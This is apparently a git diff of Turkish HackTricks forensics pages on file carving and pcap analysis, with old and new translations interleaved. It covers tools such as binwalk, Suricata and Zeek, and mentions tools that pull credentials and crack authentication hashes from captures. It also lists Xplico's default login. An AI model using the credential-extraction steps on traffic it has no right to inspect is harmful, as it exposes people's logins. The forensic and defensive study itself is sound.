Görüntülerden dosyaları çıkarmak için forensikte en yaygın kullanılan araç [**Autopsy**](https://www.autopsy.com/download/)'dir. İndirin, kurun ve dosyayı içe aktarmak için kullanın. Autopsy, disk görüntüleri ve diğer türdeki görüntüleri desteklemek üzere tasarlanmıştır, ancak basit dosyaları desteklemez.
Görüntülerden dosyalar çıkarmak için forensikte en yaygın kullanılan araç [**Autopsy**](https://www.autopsy.com/download/)'dir. İndirin, kurun ve dosyayı içe aktarmak için kullanın ve "gizli" dosyaları bulun. Autopsy, disk görüntüleri ve diğer türdeki görüntüleri desteklemek üzere inşa edilmiştir, ancak basit dosyaları desteklemez.
## Binwalk <a id="binwalk"></a>
**Binwalk**, gömülü dosyaları ve verileri aramak için bir araçtır. Resimler ve ses dosyaları gibi ikili dosyaları aramak için kullanılabilir.
`apt` ile kurulabilir, ancak [kaynak kodu](https://github.com/ReFirmLabs/binwalk) github'da bulunabilir.
**Binwalk**, gömülü dosyaları ve verileri aramak için görüntüler ve ses dosyaları gibi ikili dosyaları arayan bir araçtır.
`apt` ile yüklenebilir, ancak [kaynak kodu](https://github.com/ReFirmLabs/binwalk) github'da bulunabilir.
**Kullanışlı komutlar**:
```bash
sudo apt install binwalk #Insllation
@ -32,7 +33,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
Gizli dosyaları bulmak için yaygın bir araç olan **foremost** kullanılabilir. Foremost'un yapılandırma dosyasını `/etc/foremost.conf` konumunda bulabilirsiniz. Belirli dosyaları aramak istiyorsanız, onları yorum satırından çıkarmanız yeterlidir. Hiçbir şeyi yorum satırından çıkarmazsanız, foremost varsayılan olarak yapılandırılmış dosya türlerini arayacaktır.
Gizli dosyaları bulmak için başka yaygın bir araç **foremost**'tir. Foremost'un yapılandırma dosyasını `/etc/foremost.conf` içinde bulabilirsiniz. Belirli dosyaları aramak istiyorsanız, onları yorum satırından çıkarın. Hiçbir şeyi yorum satırından çıkarmazsanız, foremost varsayılan olarak yapılandırılmış dosya türlerini arayacaktır.
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
@ -40,54 +41,38 @@ foremost -v -i file.img -o output
```
## **Scalpel**
**Scalpel**, başka bir araçtır ve bir dosyanın içine gömülü olan dosyaları bulmak ve çıkarmak için kullanılabilir. Bu durumda, çıkarmak istediğiniz dosya türlerini yapılandırma dosyasından (_/etc/scalpel/scalpel.conf_) açıklama satırını kaldırmanız gerekecektir.
**Scalpel**, dosya içine gömülü dosyaları bulmak ve çıkarmak için kullanılabilecek başka bir araçtır. Bu durumda, çıkarmak istediğiniz dosya türlerini yapılandırma dosyasından \(_/etc/scalpel/scalpel.conf_\) yorum satırından çıkarmalısınız.
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
Bu araç, Kali içinde bulunur, ancak burada bulabilirsiniz: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
Bu araç Kali içinde gelir ancak buradan bulabilirsiniz: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
Bu araç bir görüntüyü tarayabilir ve içindeki **pcap'leri**, **ağ bilgilerini (URL'ler, alan adları, IP'ler, MAC'ler, e-postalar)** ve daha fazla **dosyayı çıkarır**. Sadece şunu yapmanız yeterlidir:
Bu araç bir görüntüyü tarayabilir ve içindeki **pcap'leri**, **ağ bilgilerini (URL'ler, alan adları, IP'ler, MAC'ler, e-postaları)** ve daha fazla **dosyayı çıkaracaktır**. Yapmanız gereken tek şey:
```text
bulk_extractor memory.img -o out_folder
```
**Tüm bilgiler** arasında gezinin \(şifreler?\), **paketleri** analiz edin \(Pcaps analizini okuyun\), **garip alan adları** arayın \(kötü amaçlı yazılımlarla ilişkili veya **var olmayan** alan adları\).
**Tüm bilgileri** inceleyin \(şifreler mi?\), **paketleri** analiz edin \(okuyun[ **Pcaps analizi**](../pcap-inspection/)\), **garip alanlar** arayın \(zararlı yazılımlarla ilişkili alanlar veya **var olmayan**\).
## PhotoRec
[https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) adresinde bulabilirsiniz.
GUI ve CLI sürümüyle birlikte gelir. PhotoRec'in arama yapmasını istediğiniz **dosya türlerini** seçebilirsiniz.
GUI ve CLI sürümüyle gelir. PhotoRec'in aramasını istediğiniz **dosya türlerini** seçebilirsiniz.
![](../../../.gitbook/assets/image%20%28524%29.png)
# Özel Veri Kesme Araçları
# Özel Veri Kazıma Araçları
## FindAES
Anahtar programlarını arayarak AES anahtarlarını bulur. TrueCrypt ve BitLocker tarafından kullanılan 128, 192 ve 256 bit anahtarları bulabilir.
AES anahtarlarını anahtar şemalarını arayarak bulur. TrueCrypt ve BitLocker tarafından kullanılan 128, 192 ve 256 bit anahtarları bulabilir.
[buradan](https://sourceforge.net/projects/findaes/) indirin.
[buradan indirin](https://sourceforge.net/projects/findaes/).
# Tamamlayıcı araçlar
Görüntüleri terminalde görmek için [**viu**](https://github.com/atanunq/viu) kullanabilirsiniz.
Resimleri terminalden görmek için [**viu** ](https://github.com/atanunq/viu)'yu kullanabilirsiniz.
Bir pdf'i metne dönüştürmek ve okumak için linux komut satırı aracı **pdftotext**'i kullanabilirsiniz.
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR göndererek paylaşın.
</details>

View file

@ -1,43 +1,44 @@
# Pcap İnceleme
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramanla öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimizden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* Hacking hilelerinizi [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/), **İspanya**'daki en önemli siber güvenlik etkinliği ve **Avrupa**'daki en önemli etkinliklerden biridir. Teknik bilginin yayılmasını amaçlayan bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
[**RootedCON**](https://www.rootedcon.com/), **İspanya**'daki en ilgili siber güvenlik etkinliği ve **Avrupa**'nın en önemlilerinden biridir. **Teknik bilgiyi teşvik etme misyonu** ile bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %}
**PCAP** vs **PCAPNG** hakkında bir not: PCAP dosya formatının iki versiyonu vardır; **PCAPNG daha yeni ve tüm araçlar tarafından desteklenmez**. Başka araçlarda çalışmak için bir dosyayı PCAPNG'den PCAP'ye Wireshark veya başka bir uyumlu araç kullanarak dönüştürmeniz gerekebilir.
**PCAP** ile **PCAPNG** hakkında bir not: PCAP dosya formatının iki versiyonu vardır; **PCAPNG daha yeni ve tüm araçlar tarafından desteklenmez**. Başka araçlarla çalışmak için bir dosyayı PCAPNG'den PCAP'ye dönüştürmeniz gerekebilir, Wireshark veya başka uyumlu bir araç kullanarak.
{% endhint %}
## Pcap'ler için çevrimiçi araçlar
## Pcap'ler için Çevrimiçi Araçlar
* Pcap başlığı **bozuk** ise, [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) adresinden düzeltebilirsiniz.
* Bir pcap içinde **bilgi** çıkarmak ve **kötü amaçlı yazılım** aramak için [**PacketTotal**](https://packettotal.com) kullanabilirsiniz.
* **Kötü amaçlı faaliyetleri** aramak için [**www.virustotal.com**](https://www.virustotal.com) ve [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) adreslerini kullanabilirsiniz.
* Eğer pcap dosyanızın başlığı **bozuk** ise şunu kullanarak **düzeltmeyi** deneyin: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* Bir pcap içinde **bilgi çıkarın** ve **zararlı yazılım** arayın: [**PacketTotal**](https://packettotal.com)
* **Zararlı faaliyetleri** aramak için [**www.virustotal.com**](https://www.virustotal.com) ve [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) kullanın
## Bilgi Çıkarma
Aşağıdaki araçlar, istatistikler, dosyalar vb. çıkarmak için kullanışlıdır.
Aşağıdaki araçlar istatistikler, dosyalar vb. çıkarmak için kullanışlıdır.
### Wireshark
{% hint style="info" %}
**Bir PCAP'ı analiz edecekseniz, temel olarak Wireshark'ı nasıl kullanacağınızı bilmelisiniz**
**Bir PCAP'ı analiz edecekseniz, Wireshark'ı nasıl kullanacağınızı bilmelisiniz**
{% endhint %}
Wireshark hakkında bazı ipuçlarına şuradan ulaşabilirsiniz:
@ -48,7 +49,7 @@ Wireshark hakkında bazı ipuçlarına şuradan ulaşabilirsiniz:
### Xplico Framework
[**Xplico** ](https://github.com/xplico/xplico)_(yalnızca linux)_ bir pcap'ı analiz edebilir ve içinden bilgi çıkarabilir. Örneğin, Xplico bir pcap dosyasından her e-postayı (POP, IMAP ve SMTP protokolleri), tüm HTTP içeriklerini, her VoIP aramasını (SIP), FTP, TFTP vb. çıkarır.
[**Xplico** ](https://github.com/xplico/xplico)_(yalnızca linux)_ bir **pcap'ı analiz edebilir** ve içinden bilgi çıkarabilir. Örneğin, Xplico, bir pcap dosyasından her e-postayı (POP, IMAP ve SMTP protokolleri), tüm HTTP içeriklerini, her VoIP aramasını (SIP), FTP, TFTP ve benzerlerini çıkarır.
**Kurulum**
```bash
@ -62,28 +63,28 @@ sudo apt-get install xplico
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
_**127.0.0.1:9876**_ kimlik bilgileriyle erişin _**xplico:xplico**_
Erişim sağlayın _**127.0.0.1:9876**_ kimlik bilgileriyle _**xplico:xplico**_
Ardından **yeni bir durum** oluşturun, durumun içinde **yeni bir oturum** oluşturun ve **pcap** dosyasını **yükleyin**.
Daha sonra **yeni bir vaka** oluşturun, vakadaki **yeni bir oturum** oluşturun ve **pcap** dosyasını **yükleyin**.
### NetworkMiner
Xplico gibi, pcaplardan nesneleri **analiz etmek ve çıkarmak** için bir araçtır. Ücretsiz bir sürümü vardır ve [**buradan indirebilirsiniz**](https://www.netresec.com/?page=NetworkMiner). **Windows** ile çalışır.\
Bu araç, paketlerden **diğer bilgileri analiz etmek** için de kullanışlıdır, böylece ne olduğunu **daha hızlı bir şekilde** öğrenebilirsiniz.
Xplico gibi, pcaps'ten nesneleri **analiz etmek ve çıkarmak** için bir araçtır. Ücretsiz bir sürümü vardır ve [**buradan**](https://www.netresec.com/?page=NetworkMiner) indirebilirsiniz. **Windows** ile çalışır.\
Bu araç ayrıca paketlerden **diğer bilgileri analiz etmek** için de kullanışlıdır, böylece neyin **daha hızlı bir şekilde** gerçekleştiğini bilmek mümkün olur.
### NetWitness Investigator
[**NetWitness Investigator'ı buradan indirebilirsiniz**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Windows'ta çalışır)**.\
Bu, paketleri **analiz eden** ve bilgileri **içeride ne olduğunu bilmek için kullanışlı bir şekilde sıralayan** başka bir kullanışlı araçtır.
Bu, paketleri **analiz eden ve bilgileri yararlı bir şekilde sıralayan** başka bir yararlı araçtır, böylece içeride ne olduğunu **bilmek mümkün olur**.
### [BruteShark](https://github.com/odedshimon/BruteShark)
* Kullanıcı adlarını ve şifreleri çıkarma ve kodlama (HTTP, FTP, Telnet, IMAP, SMTP...)
* Kimlik doğrulama karma değerlerini çıkarma ve Hashcat kullanarak kırmak (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* Görsel bir ağ diyagramı oluşturma (Ağ düğümleri ve kullanıcılar)
* Kimlik doğrulama karmaşalarını çıkarma ve Hashcat kullanarak kırma (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* Görsel ağ diyagramı oluşturma (Ağ düğümleri ve kullanıcılar)
* DNS sorgularını çıkarma
* Tüm TCP ve UDP Oturumlarını yeniden oluşturma
* Dosya Kesme
* Dosya Kurtarma
### Capinfos
```
@ -91,13 +92,13 @@ capinfos capture.pcap
```
### Ngrep
Eğer pcap içinde bir şey arıyorsanız, **ngrep** kullanabilirsiniz. İşte ana filtreleri kullanarak bir örnek:
Eğer pcap içinde bir şeyler arıyorsanız **ngrep** kullanabilirsiniz. İşte ana filtreleri kullanarak bir örnek:
```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
### Oyma
Ortak oyma tekniklerini kullanarak, pcap'ten dosyaları ve bilgileri çıkarmak faydalı olabilir:
Ortak oyma tekniklerini kullanarak pcap dosyasından dosyaları ve bilgileri çıkarmak faydalı olabilir:
{% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
@ -105,15 +106,15 @@ Ortak oyma tekniklerini kullanarak, pcap'ten dosyaları ve bilgileri çıkarmak
### Kimlik bilgilerini yakalama
[https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gibi araçları kullanarak, bir pcap veya canlı bir arayüzden kimlik bilgilerini ayrıştırabilirsiniz.
[https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gibi araçları kullanarak bir pcap dosyasından veya canlı bir arayüzden kimlik bilgilerini ayrıştırabilirsiniz.
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/), **İspanya**'daki en ilgili siber güvenlik etkinliği ve **Avrupa**'nın en önemlilerinden biridir. **Teknik bilginin teşvik edilmesi misyonuyla**, bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
[**RootedCON**](https://www.rootedcon.com/), **İspanya**'daki en ilgili siber güvenlik etkinliği ve **Avrupa**'nın en önemlilerinden biridir. **Teknik bilgiyi teşvik etme misyonu** ile bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
{% embed url="https://www.rootedcon.com/" %}
## Sızma Testi/Malware Kontrolü
## Sızma Yazılımları/Kötü Amaçlı Yazılımları Kontrol Et
### Suricata
@ -124,29 +125,23 @@ apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
```
**Pcap Kontrolü**
Pcap dosyası, ağ trafiğini kaydetmek için kullanılan bir dosya formatıdır. Pcap dosyaları, ağ üzerinde gerçekleşen iletişimi analiz etmek ve sorunları tespit etmek için kullanılır. Pcap dosyalarını kontrol etmek, ağ trafiğini incelemek ve potansiyel güvenlik tehditlerini belirlemek için önemli bir adımdır.
Pcap dosyasını kontrol etmek için aşağıdaki adımları izleyebilirsiniz:
1. **Wireshark** veya benzeri bir ağ analiz aracını kullanarak pcap dosyasınıın.
2. Dosyayı açtıktan sonra, ağ trafiğini incelemek için filtreler kullanabilirsiniz. Örneğin, belirli bir IP adresine veya port numarasına sahip paketleri filtreleyebilirsiniz.
3. Ağ trafiğini analiz ederken, dikkatlice paketlerin içeriğini inceleyin. İletilen verileri, protokol bilgilerini ve diğer önemli ayrıntıları kontrol edin.
4. Potansiyel güvenlik tehditlerini belirlemek için ağ trafiğinde anormallikleri arayın. Örneğin, şüpheli IP adresleri veya anormal protokol davranışları gibi durumlar dikkatinizi çekebilir.
5. Analiz sonuçlarını kaydedin ve gerektiğinde raporlayın. Bulduğunuz güvenlik açıklarını veya sorunları ilgili kişilere bildirin.
Pcap dosyalarını kontrol etmek, ağ güvenliği ve sorun giderme süreçlerinde önemli bir rol oynar. Bu yöntem, ağ trafiğini analiz etmek ve potansiyel tehditleri belirlemek için kullanılan temel bir adımdır.
**Pcap'ı kontrol et**
```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
### YaraPcap
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap), bir PCAP dosyasını okur ve HTTP akışlarını çıkarır. Sıkıştırılmış akışları gzip ile açar, her dosyayı yara ile tarar, bir rapor.txt dosyası yazar ve eşleşen dosyaları isteğe bağlı olarak bir dizine kaydeder.
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap), şunları yapabilen bir araçtır:
* Bir PCAP Dosyasını Okur ve Http Akışlarını Çıkarır.
* Herhangi sıkıştırılmış akışları gzip ile açar
* Her dosyayı yara ile tarar
* Bir rapor.txt dosyası yazar
* Eşleşen dosyaları isteğe bağlı olarak bir Dizin'e kaydeder
### Zararlı Yazılım Analizi
Bilinen bir zararlı yazılımın herhangi bir parmak izini bulup bulamadığını kontrol edin:
Bilinen bir zararlı yazılımın herhangi bir parmak izini bulup bulamadığınızı kontrol edin:
{% content-ref url="../malware-analysis.md" %}
[malware-analysis.md](../malware-analysis.md)
@ -154,11 +149,11 @@ Bilinen bir zararlı yazılımın herhangi bir parmak izini bulup bulamadığın
## Zeek
> [Zeek](https://docs.zeek.org/en/master/about.html), pasif, açık kaynaklı bir ağ trafiği analizörüdür. Birçok operatör, şüpheli veya kötü amaçlı faaliyetlerin araştırılmasını desteklemek için Zeek'i Bir Ağ Güvenlik Monitörü (NSM) olarak kullanır. Zeek, ayrıca performans ölçümü ve sorun giderme de dahil olmak üzere güvenlik alanının ötesinde bir dizi trafik analizi görevini destekler.
> [Zeek](https://docs.zeek.org/en/master/about.html), pasif, açık kaynaklı bir ağ trafiği analizcisidir. Birçok operatör, şüpheli veya kötü niyetli faaliyetlerin araştırılmasını desteklemek için Zeek'i bir Ağ Güvenliği İzleyicisi (NSM) olarak kullanır. Zeek ayrıca, güvenlik alanının ötesinde performans ölçümü ve sorun giderme de dahil olmak üzere geniş bir trafik analizi görevlerini destekler.
Temel olarak, `zeek` tarafından oluşturulan günlükler **pcap** dosyaları değildir. Bu nedenle, pcaplara ilişkin bilgilerin bulunduğu günlükleri analiz etmek için **diğer araçları** kullanmanız gerekecektir.
Temelde, `zeek` tarafından oluşturulan günlükler **pcap** dosyaları değildir. Bu nedenle, **bilgilerin** pcap'ler hakkında olduğu günlükleri analiz etmek için **diğer araçları** kullanmanız gerekecektir.
### Bağlantı Bilgileri
### Bağlantılar Bilgisi
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?)
@ -208,49 +203,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0
0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0
```
### DNS bilgileri
DNS (Domain Name System), internet üzerindeki alan adlarını IP adreslerine çeviren bir sistemdir. Bir PCAP dosyasını incelemek için DNS bilgilerini kullanabilirsiniz.
#### DNS Sorgularını Bulma
DNS sorgularını bulmak için aşağıdaki komutu kullanabilirsiniz:
```bash
tshark -r file.pcap -Y "dns"
```
Bu komut, PCAP dosyasındaki tüm DNS trafiğini filtreleyecektir.
#### DNS Sorgularını Ayrıştırma
DNS sorgularını ayrıştırmak için aşağıdaki komutu kullanabilirsiniz:
```bash
tshark -r file.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name
```
Bu komut, PCAP dosyasındaki tüm DNS sorgularını ayrıştıracaktır.
#### DNS Yanıtlarını Ayrıştırma
DNS yanıtlarını ayrıştırmak için aşağıdaki komutu kullanabilirsiniz:
```bash
tshark -r file.pcap -Y "dns.flags.response == 1" -T fields -e dns.resp.name -e dns.a
```
Bu komut, PCAP dosyasındaki tüm DNS yanıtlarını ayrıştıracaktır.
#### DNS Sorgularını ve Yanıtlarını Ayrıştırma
DNS sorgularını ve yanıtlarını ayrıştırmak için aşağıdaki komutu kullanabilirsiniz:
```bash
tshark -r file.pcap -Y "dns" -T fields -e dns.qry.name -e dns.a
```
Bu komut, PCAP dosyasındaki tüm DNS sorgularını ve yanıtlarını ayrıştıracaktır.
### DNS bilgisi
```bash
#Get info about each DNS request performed
cat dns.log | zeek-cut -c id.orig_h query qtype_name answers
@ -267,7 +220,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
#See top DNS domain requested with rita
rita show-exploded-dns -H --limit 10 zeek_logs
```
## Diğer pcap analizi hileleri
## Diğer pcap analizi püf noktaları
{% content-ref url="dnscat-exfiltration.md" %}
[dnscat-exfiltration.md](dnscat-exfiltration.md)
@ -285,20 +238,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) İspanya'daki en ilgili siber güvenlik etkinliği ve Avrupa'daki en önemli etkinliklerden biridir. Teknik bilginin yayılmasını amaçlayan bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
[**RootedCON**](https://www.rootedcon.com/) **İspanya**'daki en ilgili siber güvenlik etkinliği ve **Avrupa**'nın en önemlilerinden biridir. **Teknik bilgiyi teşvik etme misyonu** ile bu kongre, her disiplindeki teknoloji ve siber güvenlik profesyonelleri için kaynayan bir buluşma noktasıdır.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hackleme öğrenin<strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR göndererek paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,41 +1,43 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
Eğer bir USB bağlantısının pcap'ine çok sayıda kesintiyle sahipseniz, muhtemelen bir USB Klavye bağlantısıdır.
Eğer bir USB bağlantısının pcap dosyasına sahipseniz ve çok sayıda kesinti varsa muhtemelen bir USB Klavye bağlantısıdır.
Bu gibi bir Wireshark filtresi işe yarayabilir: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
